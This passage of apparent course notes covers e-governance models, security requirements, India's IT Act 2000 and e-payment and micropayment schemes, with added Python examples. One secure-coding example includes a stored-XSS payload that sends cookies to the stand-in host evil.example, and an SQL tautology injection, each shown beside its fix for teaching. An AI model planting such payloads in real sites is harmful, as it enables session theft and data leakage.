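        payee.balance += amount
        self._record(payee.card_id, -amount)
        payee._record(self.card_id, amount)
        return True

    def gap_when_uploaded(self) -> int:
        """Transactions performed since issue that the log no longer holds."""
        return self.seq - len(self.log)


def reconstruct_spend(purse: Purse) -> int:
    """What an auditor reading only the card log would believe was spent (cents)."""
    return -sum(e.amount_cents for e in purse.log if e.amount_cents < 0)


def demo() -> dict:
    """Card A pays card B 15 small amounts; then A's log is read back."""
    alice = Purse("card-A", 10_000)
    bob = Purse("card-B", 0)
    paid = [alice.pay(bob, 100 + i) for i in range(15)]   # 100 .. 114 cents
    return {
        "all_accepted": all(paid),
        "actual_spent": 10_000 - alice.balance,             # 1605
        "visible_in_log": reconstruct_spend(alice),         # only the last 10: 1095
        "lost_entries": alice.gap_when_uploaded(),          # 5 evicted entries
        "balance_consistent": alice.balance + bob.balance == 10_000,
    }


if __name__ == "__main__":
    print(demo())
```

The value on the two cards still adds up, which is what the purse enforces; what is gone is the evidence of the first five transfers, which is the data an auditor or fraud detector would have needed.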

E-GOVERNANCE

Although the term 'e-Governance' has gained currency in recent years, there is no standard definition of this term. Different governments and organizations define this term to suit their own aims and objectives. Sometimes the term 'e-government' is also used instead of 'e-Governance'.

Several dimensions and factors influence the definition of e-governance or electronic governance. The word "electronic" in the term e-governance implies technology-driven governance. E-governance is the application of information and communication technology (ICT) for delivering government services, exchange of information, communication transactions, integration of various stand-alone systems and services between government-to-customer (G2C), government-to-business (G2B), government-to-government (G2G), as well as back office processes and interactions within the entire government framework. Through e-governance, government services will be made available to citizens in a convenient, efficient and transparent manner. The three main target groups that can be distinguished in governance concepts are government, citizens and businesses/interest groups. In e-governance there are no distinct boundaries.

Generally four basic models are available – government-to-citizen (customer), government-to-employees, government-to-government and government-to-business.

Difference between E-Government and E-Governance –

Both terms are treated as the same; however, there is some difference between the two. E-government is the use of ICTs in public administration - combined with organizational change and new skills - to improve public services and democratic processes and to strengthen support to the public. The problem with this definition, as a definition congruent with e-governance, is that there is no provision for the governance of ICTs. As a matter of fact, the governance of ICTs most probably requires a substantial increase in regulation and policy-making capabilities, with all the expertise and opinion-shaping processes among the various social stakeholders of these concerns. So the perspective of e-governance is the use of technologies that both help governing and have to be governed. Public-Private Partnership (PPP) based e-governance projects are hugely successful in India. United Telecoms Limited, known as UTL, is a major player in India on PPP based e-governance projects. Each project had mammoth state-wide area networks in these states.

E-governance is the future many countries are looking forward to for a corruption-free government. E-government is a one-way communication protocol, whereas e-governance is a two-way communication protocol. The essence of e-governance is to reach the beneficiary and ensure that the services intended to reach the desired individual have been met. There should be an auto-response to support the essence of e-governance, whereby the Government realizes the efficacy of its governance. E-governance is by the governed, for the governed and of the governed.

Establishing the identity of the end beneficiary is a challenge in all citizen-centric services. Statistical information published by governments and world bodies does not always reveal the facts. The best form of e-governance cuts down on unwanted interference of too many layers while delivering governmental services. It depends on a good infrastructural setup, with the support of local processes and parameters, for governments to reach their citizens or end beneficiaries. Budgets for planning, development and growth can be derived from well laid out e-governance systems.

Why e-Governance?

E-Government can transform citizen service, provide access to information to empower citizens, enable their participation in government and enhance citizen economic and social opportunities, so that they can make better lives for themselves and for the next generation.

BASIC ARCHITECTURE

A suggested architecture for e-Governance is shown in the diagram, where it is illustrated that applications from various departments can be integrated together so as to be accessed by any terminal or computer from any other department, or from anywhere through the network. This is because of the characteristics of CORBA - it is a location transparent, language independent, implementation independent architecture and is Operating System independent. The applications connected through CORBA/IIOP could be legacy applications wrapped to suit CORBA specifications, any new Web application, or even a database environment using Oracle etc. Seamless interconnection, and thereby effective utility of the entire system of e-Governance, is possible if the middleware is designed to have the necessary services like Transactions, Data Base Management, Messaging and Naming.

Regarding security aspects, the CORBA Security standard is built around existing security specifications such as Distributed Computing Environment (DCE), the Kerberos Protocol and the Generic Security Service (GSS) API. While these technologies are heavily weighted, Public Key Security with Secured Socket Layer (SSL) is popular with Internet based transactions.

Types of Interactions in e-Governance

e-Governance facilitates interaction between different stakeholders in governance. These interactions may be described as follows.

G2G (Government to Government)

In this case, Information and Communications Technology is used not only to restructure the governmental processes involved in the functioning of government entities but also to increase the flow of information and services within and between different entities. This kind of interaction is only within the sphere of government and can be both horizontal, i.e. between different government agencies as well as between different functional areas within an organization, or vertical, i.e. between national, provincial and local government agencies as well as between different levels within an organization. The primary objective is to increase efficiency, performance and output.

G2C (Government to Citizens)

In this case, an interface is created between the government and citizens which enables the citizens to benefit from efficient delivery of a large range of public services. This expands the availability and accessibility of public services on the one hand and improves the quality of services on the other. It gives citizens the choice of when to interact with the government (e.g. 24 hours a day, 7 days a week), from where to interact with the government (e.g. service centre, unattended kiosk or from one's home/workplace) and how to interact with the government (e.g. through internet, fax, telephone, email, face-to-face, etc.). The primary purpose is to make government citizen-friendly.

G2B (Government to Business)

Here e-Governance tools are used to aid the business community – providers of goods and services – to seamlessly interact with the government. The objective is to cut red tape, save time, reduce operational costs and to create a more transparent business environment when dealing with the government. The G2B initiatives can be transactional, such as in licensing, permits, procurement and revenue collection. They can also be promotional and facilitative, such as in trade, tourism and investment. These measures help to provide a congenial environment to businesses to enable them to perform more efficiently.

G2E (Government to Employees)

Government is by far the biggest employer and, like any organization, it has to interact with its employees on a regular basis. This interaction is a two-way process between the organization and the employee. Use of ICT tools helps in making these interactions fast and efficient on the one hand and increases satisfaction levels of employees on the other.

Difference between G2B and B2G

Government to business (G2B) - Refers to the conducting of transactions between government bodies and business via the internet.

Business to government (B2G) - Professional affairs conducted between companies and regional, municipal or federal governing bodies. B2G typically encompasses the determination and evaluation of proposals and the completion of contracts.

PUBLIC PRIVATE PARTNERSHIPS

• Agreement between Government and the Private Sector for the Provision of a Public Good or Service by the Latter
• Generally but not always involving:
  – Long Term Contracts
  – User Charges and/or Payments flowing between the Parties
  – Shared Investments, but Mainly Private
  – Risk Sharing by the Parties
• Must be a Partnership

A public-private partnership exists when public sector agencies (federal, state or local) join with private sector entities (companies, foundations, academic institutions or citizens) and enter into a business relationship to attain a commonly shared goal that also achieves objectives of the individual partners.

Why do them?

• Fiscal Head Room
• As a Way of Financing the Project
• Separate Policy & Regulation from Operations
• Make the Good or Service Available
• Pay for Performance and Output
• Introduce Competition – For and In the Market

The Need to Set the Right Priorities –

Four Basic Dimensions of P3

Although each is unique, all P3's include four basic characteristics:

Shared goals
Shared resources (time, money, expertise, people)
Shared risks
Shared benefits

Benefits

Expedited project completion
Project cost savings
Improved quality
Use of private resources
Access to new sources of private capital

Two Major Steps

Crafting the Partnership
Implementing the Partnership

Project Management -

Six Distinct Phases

Genesis
What's the need?
What's driving the need (rationale)?
o Facility non-compliance, natural disaster, budget deficit
Is there a need for a Public/Private Partnership?

Preliminary Project Definition
Feasibility
Is a Public/Private Partnership feasible, not only financially but practically? Can it be done?
o Market Research
o Economic/Financial Analysis
o Program, Budget and Schedule
o Risk Analysis

Plan and Test
Final project definition
What is the best way to complete the project?
Has the plan been thoroughly tested to assess market demand, public and stakeholder feedback, and economics?
o Master Schedule/Budget
o Political Climate
o Any potential "fatal flaws" that could derail the project

Procurement and Contracting
How do you choose and contract with the best-value private partner?
What's the best delivery method?
o Design-Bid-Build
o Design-Build
o Finance-Design-Build
What do current statutes allow?
o Procurement Approach: Sole Source, RFP, Low Bid
o Risk Allocation between Public and Private Partners
o Structuring of Contract: Risks and Rewards

Implement
o Environmental
o Design
o Permitting
o Construction
o Commissioning and Administration

Operate
o Startup
o Monitoring
o Assessment
o Enhancement
o Contract Modifications
o Contract Renegotiations

READINESS IN E-GOVERNANCE

A high level of readiness to develop and implement e-government services is a prerequisite for a high--performing and innovative public sector that delivers integrated services making life easier for citizens and businesses E-government readiness is therefore a -significant indicator of whether a country is prepared to harvest efficiencies gained from ICT-enabled public administrations

The UNs e-government readiness index is a combined indicator of the supply of potential demand for and maturity of e-government services OECD member countries exhibit a high capacity to develop and implement e-government services This is generally characterized by an extensive broadband infrastructure a repository of electronic information on government laws and policies including links to archived information and downloadable forms and a high level of comfort with ICT by citizens and businesses Countries with the highest readiness index tend to also have a large amount of transactional and e-commerce features on their government websites As noted by the UN in its 2008 e-government survey the Scandinavian countries with the top three scores on the readiness index all generally share similar e-government environments (eg the accessibility and penetration of the electronic infrastructure) and strategies (eg the online provision of services) Each country has two main government websites one that is informative and another that is a gateway for e-government services In addition citizens and businesses are able to access many services and complete many transactions online However similar levels of e-government readiness can also result from different strategic approaches

Internet access is a prerequisite for citizens and businesses to use e-government services, and thus a leading indicator of a country's readiness to harness the potential efficiencies of ICT. Broadband penetration has increased dramatically in most OECD member countries in the past five years as countries have made significant investments in their telecommunications infrastructure.

SECURITY ISSUES IN E-GOVERNANCE

1 INTRODUCTION

The term e-Government is defined by the Organisation for Economic Co-operation and Development (OECD) as the use of new information and communication technologies (ICTs) by governments as applied to the full range of government functions. In particular, the networking potential offered by the Internet and related technologies has the potential to transform the structures and operation of government.

The effective management of information security is a key factor, as the willingness of the different users (citizens and other parties) to use e-Government services depends heavily on the trust they have in the data security of those services.

2 INFORMATION SECURITY

A central challenge of e-Government services is how the new technology can be used not only to increase efficiency for public administration but also to strengthen confidence in privacy measures by creating mutual transparency between public administration and citizens.

The process approach for an information security management system (ISMS) encourages its users to emphasize the importance of:

- understanding an organization's information security requirements and the need to establish a policy and objectives for information security;
- implementing and operating controls to manage an organization's information security risks in the context of the organization's overall business risks;
- monitoring and reviewing the performance and effectiveness of the ISMS;
- continual improvement based on objective measurement.

Data security rests on a set of security requirements:

- Authentication: the capability to identify who is using the service (a person or a software program); the process of verifying that you are who you say you are.
- Authorization: the capability to grant rights of access to resources; the process of verifying that someone has the right to do what she is trying to do.
- Confidentiality: the capability to prevent unauthorized access to information.
- Integrity: the capability to prevent unauthorized modification of information, ensuring that information can be relied upon and is accurate and complete.
- Traceability: the capability to chronologically relate any transaction to the person or system that performed the action, in a way that is verifiable.
- Non-repudiation: the capability to prevent a person or system that took part in an event or action from later denying or challenging their participation in it.
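Integrity and traceability are usually implemented together as a tamper-evident audit trail. The following is an added example written for these notes (it is not code from the source or from any e-Government system): each audit record is chained to its predecessor with an HMAC, so that editing, deleting or reordering a record is detected, and every action remains attributable to the actor who performed it. The key, the record layout and the sample events are assumptions constructed for the example. Note that an HMAC under a shared key gives integrity and traceability only to the parties who hold that key; non-repudiation as defined above would require each record to be signed with the acting user's private key instead (which is what the Act's legal recognition of digital signatures is for).

```python
import hashlib
import hmac
import json

# Hypothetical key for the example; in a deployment it would come from an HSM or a secrets manager.
AUDIT_KEY = b"example-audit-key-not-for-production"


class AuditLog:
    """Append-only, tamper-evident audit trail.

    Each record stores who (actor) did what (action) to which resource and when (ts),
    plus an HMAC-SHA256 tag over the previous record's tag and this record's body.
    Changing, deleting or reordering a record breaks its tag (or its seq number),
    and every tag after it, so verification reports the first bad entry.
    Limitation: silently dropping the *last* record(s) is not detectable from the
    log alone; the latest tag must be anchored elsewhere (published, or signed).
    """

    GENESIS = b"\x00" * 32  # tag "before" the first record (a fixed convention)

    def __init__(self, key: bytes):
        self._key = key
        self.records = []  # list of {"body": {...}, "tag": hex string}

    def _tag(self, prev_tag: bytes, body: dict) -> str:
        # Canonical JSON so the same body always serializes to the same bytes.
        msg = prev_tag + json.dumps(body, sort_keys=True, separators=(",", ":")).encode()
        return hmac.new(self._key, msg, hashlib.sha256).hexdigest()

    def append(self, actor: str, action: str, resource: str, ts: int) -> str:
        prev = bytes.fromhex(self.records[-1]["tag"]) if self.records else self.GENESIS
        body = {"seq": len(self.records), "ts": ts, "actor": actor,
                "action": action, "resource": resource}
        tag = self._tag(prev, body)
        self.records.append({"body": body, "tag": tag})
        return tag

    def verify(self) -> int:
        """Return -1 if the chain is intact, otherwise the index of the first bad record."""
        prev = self.GENESIS
        for i, rec in enumerate(self.records):
            if rec["body"].get("seq") != i:  # a record was deleted or reordered
                return i
            expected = self._tag(prev, rec["body"])
            if not hmac.compare_digest(expected, rec["tag"]):
                return i
            prev = bytes.fromhex(rec["tag"])
        return -1

    def actions_by(self, actor: str):
        """Traceability: every (ts, action, resource) attributable to one actor."""
        return [(r["body"]["ts"], r["body"]["action"], r["body"]["resource"])
                for r in self.records if r["body"]["actor"] == actor]


def demo():
    # Constructed sample events from a fictitious e-Government back office.
    log = AuditLog(AUDIT_KEY)
    log.append("clerk_17", "READ",   "citizen/4711/tax-record", ts=1700000000)
    log.append("clerk_17", "UPDATE", "citizen/4711/address",    ts=1700000060)
    log.append("admin_2",  "DELETE", "citizen/4712/tax-record", ts=1700000120)
    intact = log.verify()                      # -1: nothing has been touched

    # An insider rewrites history so the deletion looks like someone else's work.
    log.records[2]["body"]["actor"] = "clerk_17"
    tampered = log.verify()                    # 2: first record whose tag no longer matches
    return intact, tampered


if __name__ == "__main__":
    print(demo())
```

Verification walks the chain from the genesis tag, so an attacker who can modify the database but does not hold the key cannot recompute the tags; what the key holder cannot do is deny having written a record, which is why a per-actor signature is needed for non-repudiation.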

Examples of organizational and technical measures to prevent unauthorized access and processing are:

- Protecting premises, equipment and system software, including input-output units.
- Protecting software applications used to process personal data.
- Preventing unauthorized access to personal data during transmission, including transmission via telecommunication means and networks.
- Ensuring effective methods of blocking, destruction, erasure or anonymization of personal data.
- Enabling subsequent determination of when individual personal data were entered into a filing system, used or otherwise processed, and by whom, for the period covered by statutory protection of the rights of an individual with regard to unauthorized supply or processing of personal data.

Although trusted security and privacy measures are a crucial success factor for e-Government, the issue has not yet been adequately addressed: the UN 2012 Survey shows that only 20% of national portals clearly indicate the presence of security features. Europe leads, with 44% of countries displaying secure links on their national websites, but the survey did not consider regional and local websites, nor the many decentralized public-organization web portals.

3 INFORMATION SECURITY THREATS

Services provided by e-Government to citizens, enterprises, public officers, government administration and agencies via Internet and mobile connections are vulnerable to a variety of threats. Documented cyber attacks use techniques such as packet sniffing, probing, malware, attacks on Internet infrastructure, denial of service, remote-to-local and user-to-root attacks. The successful adoption of an ISMS is important to protect information assets, allowing an organization to:

- achieve greater assurance that its information assets are adequately protected against information security risks on a continual basis;
- maintain a structured and comprehensive framework for identifying and assessing information security risks, selecting and applying applicable controls, and measuring and improving their effectiveness;
- continually improve its control environment;
- effectively achieve legal and regulatory compliance.

There are simple and well-known web application vulnerabilities that could be avoided, yet e-Government websites are still exposed to them. One research study found 816 e-Government websites from 212 different countries vulnerable to Cross-Site Scripting (XSS) and Structured Query Language (SQL) injection. SQL injection lets an attacker alter the query a site sends to its database, compromising the confidentiality and integrity of the stored data, while XSS lets an attacker run script in other users' browsers and steal their session or personal information.
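Both flaws, and their standard fixes, fit in a few lines. The following is an added example written for these notes, not code from the source or from any of the surveyed sites: a fictitious citizen-tax lookup built with Python's sqlite3 module, shown once with the query assembled by string formatting (injectable) and once with a bound parameter, and a page fragment rendered once verbatim (stored XSS) and once through html.escape. The table, the sample rows and the payloads are constructed for the example.

```python
import html
import sqlite3

# Constructed sample data for a fictitious citizen-tax portal. The third "name" is a
# stored-XSS payload that a hostile user submitted through a registration form.
SAMPLE_CITIZENS = [
    ("IN-1001", "Asha Verma", 1250.00),
    ("IN-1002", "Ravi Iyer", 0.00),
    ("IN-1003", "<script>document.location='http://evil.example/?c='+document.cookie</script>", 90.50),
]


def build_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE citizens (national_id TEXT PRIMARY KEY, name TEXT, tax_due REAL)")
    conn.executemany("INSERT INTO citizens VALUES (?, ?, ?)", SAMPLE_CITIZENS)
    return conn


def lookup_vulnerable(conn, national_id: str):
    # BAD: the user's input is pasted into the SQL text, so a quote in the input
    # ends the string literal and the rest of the input becomes SQL.
    sql = "SELECT national_id, name, tax_due FROM citizens WHERE national_id = '%s'" % national_id
    return conn.execute(sql).fetchall()


def lookup_safe(conn, national_id: str):
    # GOOD: a bound parameter is handed to the database engine as data; it can
    # never change the structure of the statement.
    sql = "SELECT national_id, name, tax_due FROM citizens WHERE national_id = ?"
    return conn.execute(sql, (national_id,)).fetchall()


def render_vulnerable(name: str) -> str:
    # BAD: stored data is inserted into HTML verbatim, so a name containing a
    # <script> element executes in the browser of every clerk who views it.
    return "<p>Welcome, %s</p>" % name


def render_safe(name: str) -> str:
    # GOOD: escape for the HTML text context: '<' -> '&lt;', '"' and "'" -> entities.
    return "<p>Welcome, %s</p>" % html.escape(name, quote=True)


def demo():
    conn = build_db()
    payload = "' OR '1'='1"                       # classic tautology injection
    leaked = lookup_vulnerable(conn, payload)     # WHERE national_id = '' OR '1'='1' -> every row
    blocked = lookup_safe(conn, payload)          # no row has that literal id -> nothing
    hostile_name = lookup_safe(conn, "IN-1003")[0][1]
    return (len(leaked), len(blocked),
            "<script>" in render_vulnerable(hostile_name),
            "<script>" in render_safe(hostile_name))


if __name__ == "__main__":
    print(demo())   # (3, 0, True, False)
```

Parameterized queries close the injection regardless of what the input contains; output encoding must match the context the data lands in (HTML text here; attribute, URL and JavaScript contexts each need their own encoder).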

Specific security measures such as firewalls, intrusion detection systems, encryption and secure networks must be defined, designed and implemented for government agencies to provide the appropriate levels of security. But information security must also take into consideration the people and processes that rely on the systems. Employees with daily access to e-Government systems must be trained in cybersecurity, and this must become part of their job. A study by the Department of Computer Science at Columbia University shows how the human factor influences cybersecurity policies and how that work could be used to train government employees to improve the security posture of government departments and agencies.


CYBER CRIME AND LAWS

The expression 'Crime' is defined as an act which subjects the doer to legal punishment, or any offence against morality, social order or any unjust or shameful act. An "Offence" is defined in the Code of Criminal Procedure as an act or omission made punishable by any law for the time being in force.

Cyber crime is emerging as a serious threat. Worldwide, governments, police departments and intelligence units have started to react.

Cyber crime is a term used to broadly describe criminal activity in which computers or computer networks are a tool, a target or a place of criminal activity, and includes everything from electronic cracking to denial of service attacks. It is also used to include traditional crimes in which computers or networks are used to enable the illicit activity.

Computer crime mainly consists of unauthorized access to computer systems, data alteration, data destruction and theft of intellectual property. Cyber crime in the context of national security may involve hacking, traditional espionage or information warfare and related activities.

Pornography, threatening email, assuming someone's identity, sexual harassment, defamation, spam and phishing are some examples where computers are used to commit crime, whereas viruses, worms, industrial espionage, software piracy and hacking are examples where computers become the target of crime.

Cyber Crime Variants

Hacking

Hacking is a crime which entails cracking systems and gaining unauthorized access to the data stored in them. Hacking witnessed a 37 per cent increase this year.

Cyber Squatting

Cyber squatting is the act of registering a famous domain name and then selling it for a fortune. This is an issue that has not been tackled in the IT Act 2000.

Phishing

Phishing is just one of the many frauds on the Internet that try to fool people into parting with their money. Phishing refers to the receipt of unsolicited emails by customers of financial institutions requesting them to enter their username, password or other personal information to access their account for some reason. The fraudster then has access to the customer's online bank account and to the funds contained in that account.

Cyber Stalking

Cyber stalking is the use of the Internet or other electronic means to stalk someone. The term is used interchangeably with online harassment and online abuse. Stalking generally involves harassing or threatening behaviour that an individual engages in repeatedly, such as following a person, appearing at a person's home or place of business, making harassing phone calls, leaving written messages or objects, or vandalizing a person's property.

Vishing

Vishing is the criminal practice of using social engineering and Voice over IP (VoIP) to gain access to private personal and financial information from the public for the purpose of financial reward. The term is a combination of "voice" and "phishing". Vishing exploits the public's trust in landline telephone services. It is typically used to steal credit card numbers or other information used in identity theft schemes from individuals.

A rapidly growing online user base (figures as quoted in the source):

- 121 million Internet users
- 65 million active Internet users, up 28% from 51 million in 2010
- 50 million users shop online on e-commerce and online shopping sites
- 46+ million social network users
- 346 million mobile users subscribed to data packages


CYBER LAW

Section 66 of the IT Act 2000, as originally enacted, defined hacking:

(1) Whoever with the intent to cause or knowing that he is likely to cause wrongful loss or damage to the public or any person destroys or deletes or alters any information residing in a computer resource or diminishes its value or utility or affects it injuriously by any means, commits hack.

(2) Whoever commits hacking shall be punished with imprisonment up to three years, or with fine which may extend up to two lakh rupees, or with both.

Section 43

Whoever, without permission of the owner of the computer:

- secures access;
- downloads, copies or extracts any data, computer database or any information;
- introduces or causes to be introduced any virus or contaminant;
- disrupts or causes disruption;
- denies or causes denial of access to any person;
- provides any assistance to any person to facilitate access;
- charges the services availed of by a person to the account of another person by tampering with or manipulating any computer, computer system or computer network;

shall be liable to pay damages by way of compensation not exceeding one crore rupees to the person so affected.

The 2008 amendment added two further contraventions to Section 43:

- destroys, deletes or alters any information residing in a computer resource or diminishes its value or utility or affects it injuriously by any means;
- steals, conceals, destroys or alters, or causes any person to steal, conceal, destroy or alter, any computer source code used for a computer resource with an intention to cause damage.

Section 66, as amended in 2008, then reads: "If any person, dishonestly or fraudulently, does any act referred to in section 43, he shall be punishable with imprisonment for a term which may extend to three years or with fine which may extend to five lakh rupees or with both." [S66]

S 66A - Punishment for sending offensive messages through communication service, etc.

Any person who sends, by means of a computer resource or a communication device:

- any information that is grossly offensive or has menacing character; or
- any information which he knows to be false, but for the purpose of causing annoyance, inconvenience, danger, obstruction, insult, injury, criminal intimidation, enmity, hatred or ill will, persistently makes by making use of such computer resource or a communication device; or
- any electronic mail or electronic mail message for the purpose of causing annoyance or inconvenience or to deceive or to mislead the addressee or recipient about the origin of such messages;

shall be punishable with imprisonment for a term which may extend to three years and with fine.

S 66C - Punishment for identity theft

"Whoever, fraudulently or dishonestly, makes use of the electronic signature, password or any other unique identification feature of any other person, shall be punished with imprisonment of either description for a term which may extend to three years and shall also be liable to fine which may extend to rupees one lakh."

S 66D - Punishment for cheating by personation by using computer resource

"Whoever, by means of any communication device or computer resource, cheats by personation, shall be punished with imprisonment of either description for a term which may extend to three years and shall also be liable to fine which may extend to one lakh rupees."

S 66E - Punishment for violation of privacy

"Whoever, intentionally or knowingly captures, publishes or transmits the image of a private area of any person without his or her consent, under circumstances violating the privacy of that person, shall be punished with imprisonment which may extend to three years or with fine not exceeding two lakh rupees, or with both."

S 67A - Punishment for publishing or transmitting of material containing sexually explicit act, etc., in electronic form

"Whoever publishes or transmits or causes to be published or transmitted in the electronic form any material which contains sexually explicit act or conduct shall be punished on first conviction with imprisonment of either description for a term which may extend to five years and with fine which may extend to ten lakh rupees."

S 67C - Preservation and retention of information by intermediaries

"(1) Intermediary shall preserve and retain such information as may be specified for such duration and in such manner and format as the Central Government may prescribe.

(2) Any intermediary who intentionally or knowingly contravenes the provisions of sub-section (1) shall be punished with an imprisonment for a term which may extend to three years and shall also be liable to fine."


IT ACT

The Information Technology Act 2000 (also known as ITA-2000 or the IT Act) is an Act of the Indian Parliament (No. 21 of 2000) notified on October 17, 2000. The Act is being opposed by the Save Your Voice campaign and other civil society organizations in India. The user-review and consumer social networking site MouthShut.com has filed a writ petition in the Supreme Court of India to repeal and nullify parts of the IT Act 2000.

The United Nations General Assembly, by resolution A/RES/51/162 dated 30 January 1997, adopted the Model Law on Electronic Commerce prepared by the United Nations Commission on International Trade Law. This is referred to as the UNCITRAL Model Law on E-Commerce. Following the UN resolution, India passed the Information Technology Act 2000 in May 2000, which came into force on October 17, 2000. The Information Technology Act 2000 has been substantially amended through the Information Technology (Amendment) Act 2008, which was passed by the two houses of the Indian Parliament on December 23 and 24, 2008. It received Presidential assent on February 5, 2009 and came into force on October 27, 2009. The amended Act places additional focus on information security. It added several new sections on offences, including cyber terrorism and data protection. A set of Rules relating to sensitive personal information and reasonable security practices (mentioned in section 43A of the ITAA 2008) was notified in April 2011.

Provisions –

The Information Technology Act 2000 consisted of 94 sections segregated into 13 chapters. Four schedules form part of the Act. In the 2008 version of the Act there are 124 sections (excluding 5 sections that have been omitted from the earlier version) and 14 chapters. Schedules I and II have been replaced; Schedules III and IV are deleted.

Information Technology Act 2000 addressed the following issues

1 Legal recognition of electronic documents

2 Legal Recognition of digital signatures

3 Offenses and contraventions

4 Justice dispensation systems for cybercrimes

Offences –

Section 65: Tampering with computer source documents (intentional concealment, destruction or alteration of source code when the computer source code is required to be kept or maintained by law for the time being in force). Punishment: imprisonment up to three years, or fine up to 2 lakh rupees, or both.

Section 66: Hacking. Punishment: imprisonment up to three years, or fine up to 5 lakh rupees, or both.

Section 66-A: Sending offensive messages through electronic means (sending any information through an electronic message that is grossly offensive or has menacing character and might cause insult, injury, criminal intimidation, enmity, hatred or ill will, etc., or sending such mail intended to deceive or mislead the addressee or recipient about the origin of such messages). Punishment: imprisonment up to three years and with fine.

Criticisms –

The 2008 Amendment Act was passed in an eventful Parliamentary session on 23 December 2008 with no discussion in the House. Some cyber law observers have criticized the amendments for the lack of legal and procedural safeguards to prevent violation of the civil liberties of Indians. There has also been appreciation of the amendments from many observers because they address the issue of cyber security.

Section 69 empowers the Central Government/State Government and its authorized agencies to intercept, monitor or decrypt any information generated, transmitted, received or stored in any computer resource if it is necessary or expedient to do so in the interest of the sovereignty or integrity of India, defence of India, security of the State, friendly relations with foreign States or public order, or for preventing incitement to the commission of any cognizable offence, or for investigation of any offence. They can also compel assistance from computer personnel in decrypting data (mandatory decryption) under penalty of imprisonment.

Section 66A is widely criticized. It has led to numerous abuses reported by the press. Section 66A has also been criticised and challenged in the Lucknow and Madras High Courts for its constitutional validity. Based on Section 66A, the Bombay High Court has held that creating a website and storing false information on it can entail cyber crime. (Section 66A was subsequently struck down in its entirety as unconstitutional by the Supreme Court of India in Shreya Singhal v. Union of India, March 2015.)


2. The merchant's sales system securely transfers the order information to CyberSource over the Internet.
3. CyberSource forwards the bank routing number and account number to the processor.
4. The routing number and account number are validated and the integrity of the account's checking history is verified. The processor forwards the approve/decline result to CyberSource.
5. CyberSource returns the approve/decline message to the merchant.
6. If approved, CyberSource routes the check for settlement through a processor to the Automated Clearing House (ACH) system. Funds are deposited in approximately 1-3 business days.
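Step 4 is where a processor rejects most malformed or fraudulent e-checks before anything reaches the ACH. The following is an added example written for these notes, not CyberSource's or any processor's code: it implements the structural validation of a US ABA routing number (nine digits, a permitted Federal Reserve prefix, and the weighted mod-10 check digit) and wraps it in a simulated approve/decline decision covering steps 3 to 5. The negative-history set, the account-number length rule and the sample numbers are constructed for the example; a real processor would also check the routing number against the FedACH participant directory.

```python
# ABA routing-number structure (assumed here from the published ABA format): nine
# digits; the first two (Federal Reserve routing symbol) fall in 00-12, 21-32,
# 61-72 or 80; the ninth is a check digit such that
#   3*(d1+d4+d7) + 7*(d2+d5+d8) + 1*(d3+d6+d9) == 0 (mod 10).
VALID_PREFIX_RANGES = ((0, 12), (21, 32), (61, 72), (80, 80))
WEIGHTS = (3, 7, 1, 3, 7, 1, 3, 7, 1)


def valid_routing_number(rtn: str) -> bool:
    """True if rtn has the right shape, an allowed prefix and a correct check digit."""
    if len(rtn) != 9 or not rtn.isdigit():
        return False
    prefix = int(rtn[:2])
    if not any(lo <= prefix <= hi for lo, hi in VALID_PREFIX_RANGES):
        return False
    return sum(w * int(d) for w, d in zip(WEIGHTS, rtn)) % 10 == 0


# Constructed processor state: (routing, account) pairs with returned items (NSF, closed, ...).
NEGATIVE_HISTORY = {("021000021", "9876543210")}


def authorize_echeck(rtn: str, account: str, amount: float):
    """Simulate steps 3-5: validate identifiers, consult history, return (decision, reason)."""
    if not valid_routing_number(rtn):
        return ("DECLINE", "invalid routing number")
    # Assumed rule: ACH account numbers are 4-17 digits (the DFI account field width).
    if not (4 <= len(account) <= 17 and account.isdigit()):
        return ("DECLINE", "malformed account number")
    if amount <= 0:
        return ("DECLINE", "invalid amount")
    if (rtn, account) in NEGATIVE_HISTORY:
        return ("DECLINE", "negative check history")
    return ("APPROVE", "queued for ACH settlement")


def demo():
    # 021000021 satisfies the checksum: 3*(0+0+0) + 7*(2+0+2) + 1*(1+0+1) = 30.
    return [
        authorize_echeck("021000021", "1234567890", 45.00),   # APPROVE
        authorize_echeck("021000022", "1234567890", 45.00),   # DECLINE: check digit fails
        authorize_echeck("021000021", "9876543210", 45.00),   # DECLINE: returned items on file
        authorize_echeck("021000021", "12AB", 45.00),         # DECLINE: not a digit string
    ]


if __name__ == "__main__":
    for decision in demo():
        print(decision)
```

The checksum only catches transcription errors and crude fabrication; an attacker who copies a valid routing number from any printed check passes it, which is why the history check and the later ACH return handling still matter.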

Four Different Scenarios of the FSTC E-check System –


MICROPAYMENT METHODS

Traditional payment methods are called macropayment methods. A new type of payment method, known as a micropayment method, is emerging to cater for very low value transactions. Examples:

- Millicent (pre-payment / credit based)
- PayWord (post-payment)


MICRO PAYMENT IS -

- Very small payments made over the Web
- Transactions too small for credit cards
- Can be as little as a fraction of a cent
- An alternative to subscription and advertising
- Can go in either direction

A micropayment is an e-commerce transaction involving a very small sum of money in exchange for something made available online, such as an application download, a service or Web-based content.

Micropayments are sometimes defined as anything less than 75 cents and can be as low as a fraction of a cent. A special type of system is required for such payments, which are too small to be feasible for processing through credit card companies.

Here is one scheme for micropayment. The user and seller each establish an account with a third-party service provider who monitors, collects and distributes micropayments. The seller encodes per-fee links inside a Web page. When the user initiates a transaction, payment goes through an Internet wallet account managed by the service provider. Micropayments accumulate until they are collected as single larger payments. Such a system is helpful when a user wants to make one-time micropayments to multiple sellers. Seller-based accounts are more common for repeat business with an individual enterprise.

Once a common micropayment standard has been established, some experts predict that streaming media sites, music and application downloads, content vendors, sports access sites and other specialized resources will make pay-per-use common online.
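The notes name PayWord as a post-payment scheme and describe a broker model in which payments accumulate and are collected later; the two fit together, because PayWord (Rivest and Shamir) is exactly a cryptographic way to let a vendor accept many tiny payments offline and redeem them with a broker in one settlement. The following is an added example written for these notes, not code from the source or from any PayWord implementation: the user builds a hash chain w_n, w_{n-1} = h(w_n), ..., w_0, commits to w_0, and pays by revealing successive w_i; the vendor checks each new word by hashing it back to the last one accepted; the broker credits the vendor for i units when h^i(w_i) equals the registered w_0. The user's signed commitment of w_0 to the broker is assumed to happen out of band (a simple registry stands in for it), and the deterministic seed is constructed for the example.

```python
import hashlib
import hmac
import os


def h(x: bytes) -> bytes:
    return hashlib.sha256(x).digest()


def make_paywords(n: int, seed=None) -> list:
    """User side. Pick w_n at random and hash backwards: w_i = h(w_{i+1}).
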